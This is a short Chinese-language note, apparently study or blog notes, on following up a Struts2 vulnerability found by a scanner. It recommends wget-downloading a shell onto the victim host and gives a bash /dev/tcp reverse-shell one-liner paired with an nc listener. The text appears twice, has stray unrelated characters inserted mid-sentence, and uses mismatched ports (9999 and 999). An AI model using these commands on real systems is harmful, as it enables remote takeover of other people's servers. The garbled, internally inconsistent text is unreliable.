思考:
利用常見(jiàn)的struts2漏洞檢查工具發(fā)現(xiàn)有漏洞后該如何進(jìn)一步操作呢娶视?
參考思路:
1晒哄、wget下載shell到受害主機(jī)上進(jìn)行操作
2、利用bash 反彈一個(gè)shell肪获,用nc連接(受害主機(jī)上執(zhí)行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1寝凌,攻擊者的主機(jī)上執(zhí)行 nc -lvnp 999)
利用常見(jiàn)的struts2漏洞檢查工具發(fā)現(xiàn)有漏洞后該如何進(jìn)一步操作呢娶视?
1晒哄、wget下載shell到受害主機(jī)上進(jìn)行操作
2、利用bash 反彈一個(gè)shell肪获,用nc連接(受害主機(jī)上執(zhí)行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1寝凌,攻擊者的主機(jī)上執(zhí)行 nc -lvnp 999)